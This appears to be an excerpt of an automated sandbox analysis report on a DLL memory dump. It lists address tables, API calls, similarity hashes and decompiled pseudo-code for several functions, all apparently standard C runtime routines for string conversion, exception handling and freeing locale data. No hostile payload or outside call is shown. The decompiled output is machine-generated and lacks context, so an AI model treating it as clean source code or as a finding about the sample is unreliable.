    0x6e1fef0e
    0x6e1fef11
    0x6e1fef16
    0x6e1fef19
    0x00000000
    0x00000000
    0x6e1fef26
    0x00000000
    0x6e1fef26
    0x6e1fef08
    0x6e1fef0c
    0x00000000
    0x00000000
    0x00000000
    0x6e1fee6e
    0x6e1fee6e
    0x6e1fee76
    0x00000000
    0x00000000
    0x6e1fee80
    0x6e1fee83
    0x6e1fee86
    0x6e1fee8c
    0x00000000
    0x00000000
    0x6e1fee98
    0x6e1feea6
    0x00000000
    0x00000000
    0x6e1feeb3
    0x6e1feec4
    0x6e1feeda
    0x6e1feee2
    0x6e1feee2
    0x6e1feee5
    0x00000000
    0x6e1fee83

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
    • String ID: @
    • API String ID: 2441703863-2766056989
    • Opcode ID: eabce15f963beefe42bb1442c5ee1d1e669c604992ee1ab8db89c92ca445757f
    • Instruction ID: 1ef3af5e38f6e963066dd5a6b986f2000e2626e248f7cb8d10b65a8e6e20900d
    • Opcode Fuzzy Hash: eabce15f963beefe42bb1442c5ee1d1e669c604992ee1ab8db89c92ca445757f
    • Instruction Fuzzy Hash: BCE11BB1900248DFDB04CFD8C990AEEBBF9BF48304F144659E519AB295D734AE82DF90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21E9DF, Relevance: 10.8, APIs: 7, Instructions: 268COMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			E6E21E9DF(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E6E20CE7E(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E6E20CE7E(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E6E20FBEC(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E6E204540();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E6E20FBEC(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E6E204540();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E6E213725(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E6E2035A7(_t130);
													}
												}
											}
										}
									}
								}
								E6E2035A7(_t100);
							}
						}
					}
				}
				L63:
				return E6E203D51(_v8 ^ _t132);
			}






































    0x6e21e9e7
    0x6e21e9ee
    0x6e21e9f6
    0x6e21e9f9
    0x6e21e9ff
    0x6e21ea02
    0x6e21ea05
    0x6e21ea09
    0x6e21ea0c
    0x6e21ea11
    0x6e21ea38
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e21ea13
    0x6e21ea1b
    0x6e21ea1d
    0x6e21ea21
    0x6e21ea21
    0x6e21ea26
    0x6e21ea44
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e21ea28
    0x6e21ea31
    0x6e21ea46
    0x6e21ea46
    0x6e21ea4b
    0x6e21ea52
    0x6e21ea55
    0x6e21ea55
    0x6e21ea5a
    0x6e21ea66
    0x6e21ea73
    0x6e21ea80
    0x6e21ea93
    0x00000000
    0x6e21ea95
    0x6e21ea97
    0x6e21eaca
    0x00000000
    0x6e21eacc
    0x6e21eace
    0x6e21ead2
    0x6e21ead8
    0x6e21eadb
    0x6e21eadd
    0x6e21eae0
    0x6e21eae0
    0x6e21eae5
    0x00000000
    0x00000000
    0x6e21eae7
    0x6e21eaeb
    0x6e21eaf5
    0x6e21eafa
    0x00000000
    0x6e21eafc
    0x00000000
    0x6e21eafc
    0x6e21eafa
    0x00000000
    0x6e21eaeb
    0x6e21eae0
    0x6e21eadb
    0x00000000
    0x6e21ead2
    0x6e21ea99
    0x6e21ea9b
    0x6e21ea9f
    0x6e21eaa5
    0x6e21eaa8
    0x6e21eaaa
    0x6e21eaaa
    0x6e21eaaf
    0x00000000
    0x00000000
    0x6e21eab1
    0x6e21eab5
    0x6e21eabf
    0x6e21eac4
    0x00000000
    0x6e21eac6
    0x00000000
    0x6e21eac6
    0x6e21eac4
    0x00000000
    0x6e21eab5
    0x6e21eaaa
    0x6e21eaa8
    0x00000000
    0x6e21ea9f
    0x6e21ea97
    0x6e21ea82
    0x6e21ea82
    0x6e21ea82
    0x00000000
    0x6e21ea82
    0x6e21ea75
    0x6e21ea75
    0x6e21ea77
    0x6e21ea68
    0x6e21ea68
    0x6e21ea6a
    0x6e21ea6a
    0x6e21eb01
    0x6e21eb01
    0x6e21eb01
    0x6e21eb0e
    0x6e21eb14
    0x6e21eb19
    0x6e21ea3a
    0x6e21eb1f
    0x6e21eb1f
    0x6e21eb27
    0x6e21eb2b
    0x6e21eb86
    0x6e21eb88
    0x00000000
    0x6e21eb2d
    0x6e21eb32
    0x6e21eb34
    0x6e21eb36
    0x6e21eb3e
    0x6e21eb62
    0x6e21eb67
    0x6e21eb6c
    0x6e21eb72
    0x00000000
    0x6e21eb78
    0x6e21eb78
    0x00000000
    0x6e21eb78
    0x6e21eb40
    0x6e21eb42
    0x6e21eb46
    0x6e21eb4b
    0x6e21eb4d
    0x6e21eb52
    0x6e21ec67
    0x6e21ec67
    0x6e21eb58
    0x6e21eb58
    0x6e21eb7e
    0x6e21eb7e
    0x6e21eb81
    0x6e21eb8b
    0x6e21eb8d
    0x00000000
    0x6e21eb93
    0x6e21eb9b
    0x6e21eba9
    0x00000000
    0x6e21ebaf
    0x6e21ebb8
    0x6e21ebbe
    0x6e21ebc3
    0x00000000
    0x6e21ebc9
    0x6e21ebc9
    0x6e21ebcc
    0x6e21ebd1
    0x6e21ebd5
    0x6e21ec21
    0x00000000
    0x6e21ebd7
    0x6e21ebdc
    0x6e21ebde
    0x6e21ebe0
    0x6e21ebe8
    0x6e21ec05
    0x6e21ec0f
    0x6e21ec11
    0x6e21ec14
    0x00000000
    0x6e21ec16
    0x6e21ec16
    0x00000000
    0x6e21ec16
    0x6e21ebea
    0x6e21ebec
    0x6e21ebf0
    0x6e21ebf5
    0x6e21ebf9
    0x6e21ec5b
    0x6e21ec5b
    0x6e21ebfb
    0x6e21ebfb
    0x6e21ec1c
    0x6e21ec1c
    0x6e21ec23
    0x6e21ec25
    0x00000000
    0x6e21ec3e
    0x6e21ec3e
    0x6e21ec57
    0x6e21ec57
    0x6e21ec25
    0x6e21ebf9
    0x6e21ebe8
    0x6e21ec5f
    0x6e21ec64
    0x6e21ebc3
    0x6e21eba9
    0x6e21eb8d
    0x6e21eb52
    0x6e21eb3e
    0x6e21ec6b
    0x6e21ec71
    0x6e21eb19
    0x6e21ea5a
    0x6e21ea26
    0x6e21ec73
    0x6e21ec86

    APIs
    • GetCPInfo.KERNEL32(02B246F0,02B246F0,?,7FFFFFFF,?,?,6E21ECB8,02B246F0,02B246F0,?,02B246F0,?,?,?,?,02B246F0), ref: 6E21EA8B
    • MultiByteToWideChar.KERNEL32(02B246F0,00000009,02B246F0,02B246F0,00000000,00000000,?,6E21ECB8,02B246F0,02B246F0,?,02B246F0,?,?,?,?), ref: 6E21EB0E
    • MultiByteToWideChar.KERNEL32(02B246F0,00000001,02B246F0,02B246F0,00000000,6E21ECB8,?,6E21ECB8,02B246F0,02B246F0,?,02B246F0,?,?,?,?), ref: 6E21EBA1
    • MultiByteToWideChar.KERNEL32(02B246F0,00000009,02B246F0,02B246F0,00000000,00000000,?,6E21ECB8,02B246F0,02B246F0,?,02B246F0,?,?,?,?), ref: 6E21EBB8
      • Part of subcall function 6E20FBEC: HeapAlloc.KERNEL32(00000000,0000060B,?,?,6E203D1F,0000060B,?,6E1F73C4,0000060B), ref: 6E20FC1E
    • MultiByteToWideChar.KERNEL32(02B246F0,00000001,02B246F0,02B246F0,00000000,02B246F0,?,6E21ECB8,02B246F0,02B246F0,?,02B246F0,?,?,?,?), ref: 6E21EC34
    • __freea.LIBCMT ref: 6E21EC5F
    • __freea.LIBCMT ref: 6E21EC6B
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharMultiWide$__freea$AllocHeapInfo
    • String ID:
    • API String ID: 2171645-0
    • Opcode ID: fe8ee2801e72b47e974a0cb889971c4ede78c346a6068cfac68e4d3ece03c3f6
    • Instruction ID: 3696d1bcf422a9c9447b7fe2a56594034508b3e499b850165f41eef7dd4f8a69
    • Opcode Fuzzy Hash: fe8ee2801e72b47e974a0cb889971c4ede78c346a6068cfac68e4d3ece03c3f6
    • Instruction Fuzzy Hash: 7691C071E1821F9FDB108BE4CC91EEE7BFAAF09715F140529EA15E7680D725DA40CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E206FD0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
    Download Yara Rule
    C-Code - Quality: 45%
    			E6E206FD0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t50;
				signed int _t57;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr _t62;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr _t78;
				signed int _t80;
				char _t82;
				intOrPtr _t85;
				intOrPtr _t94;
				intOrPtr _t97;
				intOrPtr* _t99;
				void* _t103;
				void* _t105;
				void* _t113;

				_t76 = _a8;
				_v5 = 0;
				_t97 = _t76 + 0x10;
				_v16 = 1;
				_v20 = _t97;
				_v12 =  *(_t76 + 8) ^  *0x6e24b164;
				E6E206F90( *(_t76 + 8) ^  *0x6e24b164, _t97, __edi, __esi);
				E6E2080AC(_a12);
				_t50 = _a4;
				_t105 = _t103 - 0x1c + 0xc;
				_t94 =  *((intOrPtr*)(_t76 + 0xc));
				if(( *(_t50 + 4) & 0x00000066) != 0) {
					__eflags = _t94 - 0xfffffffe;
					if(_t94 != 0xfffffffe) {
						E6E208260(_t76, 0xfffffffe, _t97, 0x6e24b164);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t50;
					_v28 = _a12;
					 *((intOrPtr*)(_t76 - 4)) =  &_v32;
					if(_t94 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t80 = _v12;
							_t20 = _t94 + 2; // 0x3
							_t57 = _t94 + _t20 * 2;
							_t78 =  *((intOrPtr*)(_t80 + _t57 * 4));
							_t58 = _t80 + _t57 * 4;
							_t81 =  *((intOrPtr*)(_t58 + 4));
							_v24 = _t58;
							if( *((intOrPtr*)(_t58 + 4)) == 0) {
								_t82 = _v5;
								goto L8;
							} else {
								_t59 = E6E208210(_t81, _t97);
								_t82 = 1;
								_v5 = 1;
								_t113 = _t59;
								if(_t113 < 0) {
									_v16 = 0;
									L14:
									_push(_t97);
									_push(_v12);
									E6E206F90();
									goto L15;
								} else {
									if(_t113 > 0) {
										_t60 = _a4;
										__eflags =  *_t60 - 0xe06d7363;
										if( *_t60 == 0xe06d7363) {
											__eflags =  *0x6e23d950;
											if(__eflags != 0) {
												_t72 = E6E21F1C0(__eflags, 0x6e23d950);
												_t105 = _t105 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t99 =  *0x6e23d950; // 0x6e205de8
													 *0x6e2211c4(_a4, 1);
													 *_t99();
													_t97 = _v20;
													_t105 = _t105 + 8;
												}
												_t60 = _a4;
											}
										}
										E6E208244(_t60, _a8, _t60);
										_t62 = _a8;
										__eflags =  *((intOrPtr*)(_t62 + 0xc)) - _t94;
										if( *((intOrPtr*)(_t62 + 0xc)) != _t94) {
											E6E208260(_t62, _t94, _t97, 0x6e24b164);
											_t62 = _a8;
										}
										_push(_t97);
										_push(_v12);
										 *((intOrPtr*)(_t62 + 0xc)) = _t78;
										E6E206F90();
										_t85 =  *((intOrPtr*)(_v24 + 8));
										E6E208228();
										asm("int3");
										E6E2071EC();
										E6E20854B();
										__eflags = E6E208277();
										if(__eflags != 0) {
											_t67 = E6E207320(_t85, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E6E2082B3();
												goto L25;
											}
										} else {
											L25:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L8;
									}
								}
							}
							goto L29;
							L8:
							_t94 = _t78;
						} while (_t78 != 0xfffffffe);
						if(_t82 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L29:
			}





























    0x6e206fd7
    0x6e206fdc
    0x6e206fe3
    0x6e206fee
    0x6e206ff5
    0x6e206ff8
    0x6e206ffb
    0x6e207003
    0x6e207008
    0x6e20700b
    0x6e20700e
    0x6e207015
    0x6e207076
    0x6e207079
    0x6e207088
    0x00000000
    0x6e207088
    0x00000000
    0x6e207017
    0x6e207017
    0x6e20701d
    0x6e207023
    0x6e207029
    0x6e207099
    0x6e2070a2
    0x6e20702b
    0x6e207030
    0x6e207030
    0x6e207033
    0x6e207036
    0x6e207039
    0x6e20703c
    0x6e20703f
    0x6e207042
    0x6e207047
    0x6e20705d
    0x00000000
    0x6e207049
    0x6e20704b
    0x6e207050
    0x6e207052
    0x6e207055
    0x6e207057
    0x6e20706d
    0x6e20708d
    0x6e20708d
    0x6e20708e
    0x6e207091
    0x00000000
    0x6e207059
    0x6e207059
    0x6e2070a3
    0x6e2070a6
    0x6e2070ac
    0x6e2070ae
    0x6e2070b5
    0x6e2070bc
    0x6e2070c1
    0x6e2070c4
    0x6e2070c6
    0x6e2070c8
    0x6e2070d5
    0x6e2070db
    0x6e2070dd
    0x6e2070e0
    0x6e2070e0
    0x6e2070e3
    0x6e2070e3
    0x6e2070b5
    0x6e2070eb
    0x6e2070f0
    0x6e2070f3
    0x6e2070f6
    0x6e207102
    0x6e207107
    0x6e207107
    0x6e20710a
    0x6e20710b
    0x6e20710e
    0x6e207111
    0x6e20711e
    0x6e207121
    0x6e207126
    0x6e207127
    0x6e20712c
    0x6e207136
    0x6e207138
    0x6e20713d
    0x6e207142
    0x6e207144
    0x6e20714f
    0x6e207146
    0x6e207146
    0x00000000
    0x6e207146
    0x6e20713a
    0x6e20713a
    0x6e20713a
    0x6e20713c
    0x6e20713c
    0x6e20705b
    0x00000000
    0x6e20705b
    0x6e207059
    0x6e207057
    0x00000000
    0x6e207060
    0x6e207060
    0x6e207062
    0x6e207069
    0x00000000
    0x6e20706b
    0x00000000
    0x6e207069
    0x6e207029
    0x00000000

    APIs
    • _ValidateLocalCookies.LIBCMT ref: 6E206FFB
    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E207003
    • _ValidateLocalCookies.LIBCMT ref: 6E207091
    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E2070BC
    • _ValidateLocalCookies.LIBCMT ref: 6E207111
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: dcc7d995e642a50c3cb64042209059eb9abb7ba56707f91efdba556968071ea2
    • Instruction ID: 0c98d0e05145d927371865734251a83d29daae29d747b6d122bd20ebdf221814
    • Opcode Fuzzy Hash: dcc7d995e642a50c3cb64042209059eb9abb7ba56707f91efdba556968071ea2
    • Instruction Fuzzy Hash: AE419534A1020E9FCF00DFA8C894A9EBBB7AF45318F148655D8189B3D1D772EA15CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E214B3C, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
    Download Yara Rule
    C-Code - Quality: 90%
    			E6E214B3C(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E6E2136D7(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E6E20FBEC(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E6E20BB48(GetLastError());
								}
							}
							E6E20FBB2(_t40);
							_t14 = _t35;
						} else {
							E6E20BB48(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E6E20BB7E())) = 0x16;
						E6E208929();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E6E20BB7E())) = 0x16;
				E6E208929();
				return 0;
			}
















    0x6e214b41
    0x6e214b46
    0x6e214b60
    0x6e214b63
    0x6e214b65
    0x6e214b7e
    0x6e214b80
    0x6e214b87
    0x6e214b89
    0x6e214b92
    0x6e214b93
    0x6e214b97
    0x6e214b9d
    0x6e214ba0
    0x6e214ba2
    0x6e214bbc
    0x6e214bbf
    0x6e214bc1
    0x6e214bce
    0x6e214bd4
    0x6e214bd6
    0x6e214bea
    0x6e214bec
    0x6e214bf0
    0x6e214bf0
    0x6e214bf1
    0x6e214bd8
    0x6e214bdf
    0x6e214be4
    0x6e214bd6
    0x6e214bf4
    0x6e214bf9
    0x6e214ba4
    0x6e214bab
    0x6e214bb0
    0x6e214bb0
    0x6e214b67
    0x6e214b6c
    0x6e214b72
    0x6e214b77
    0x6e214b77
    0x00000000
    0x6e214bfe
    0x6e214b4d
    0x6e214b53
    0x00000000

    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b651a17a9ec5c75ecb60cae000807072931767f8112566a0afbba7c55cbb27b8
    • Instruction ID: 210b8ae9a823e9e0f2c3dc960c83e74f94438835595636d3eb004fb3570adb59
    • Opcode Fuzzy Hash: b651a17a9ec5c75ecb60cae000807072931767f8112566a0afbba7c55cbb27b8
    • Instruction Fuzzy Hash: 0511D83691C15DBFDB201FF68C08EDB7AAEEF82769B100614FD1AC6288DB318701C660
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21B988, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E21B988(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E21B6CF(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x6e1f73e0
					E6E21B6CF(_t2, 7);
					_t3 = _t45 + 0x38; // 0x6e1f73fc
					E6E21B6CF(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x6e1f742c
					E6E21B6CF(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x6e1f745c
					E6E21B6CF(_t5, 2);
					_t6 = _t45 + 0xa0; // 0x6e24b000
					E6E20FBB2( *_t6);
					_t7 = _t45 + 0xa4; // 0xb0d80d03
					E6E20FBB2( *_t7);
					_t8 = _t45 + 0xa8; // 0xd896e24
					E6E20FBB2( *_t8);
					_t9 = _t45 + 0xb4; // 0x6e1f7478
					E6E21B6CF(_t9, 7);
					_t10 = _t45 + 0xd0; // 0x6e1f7494
					E6E21B6CF(_t10, 7);
					_t11 = _t45 + 0xec; // 0x6e1f74b0
					E6E21B6CF(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x6e1f74e0
					E6E21B6CF(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x6e1f7510
					E6E21B6CF(_t13, 2);
					_t14 = _t45 + 0x154; // 0x8b8d233
					E6E20FBB2( *_t14);
					_t15 = _t45 + 0x158; // 0x6b000000
					E6E20FBB2( *_t15);
					_t16 = _t45 + 0x15c; // 0x888900c0
					E6E20FBB2( *_t16);
					_t17 = _t45 + 0x160; // 0x6e24b050
					return E6E20FBB2( *_t17);
				}
				return _t18;
			}





    0x6e21b98e
    0x6e21b993
    0x6e21b99c
    0x6e21b9a1
    0x6e21b9a7
    0x6e21b9ac
    0x6e21b9b2
    0x6e21b9b7
    0x6e21b9bd
    0x6e21b9c2
    0x6e21b9cb
    0x6e21b9d0
    0x6e21b9d6
    0x6e21b9db
    0x6e21b9e1
    0x6e21b9e6
    0x6e21b9ec
    0x6e21b9f1
    0x6e21b9fa
    0x6e21b9ff
    0x6e21ba08
    0x6e21ba10
    0x6e21ba19
    0x6e21ba1e
    0x6e21ba27
    0x6e21ba2c
    0x6e21ba35
    0x6e21ba3a
    0x6e21ba40
    0x6e21ba45
    0x6e21ba4b
    0x6e21ba50
    0x6e21ba56
    0x6e21ba5b
    0x00000000
    0x6e21ba66
    0x6e21ba6b

    APIs
      • Part of subcall function 6E21B6CF: _free.LIBCMT ref: 6E21B6F8
    • _free.LIBCMT ref: 6E21B9D6
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    • _free.LIBCMT ref: 6E21B9E1
    • _free.LIBCMT ref: 6E21B9EC
    • _free.LIBCMT ref: 6E21BA40
    • _free.LIBCMT ref: 6E21BA4B
    • _free.LIBCMT ref: 6E21BA56
    • _free.LIBCMT ref: 6E21BA61
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 8150f2849fa73c3c1386e614bce17a8c7f263fcc3cf36198d2fcf3c8acff8a63
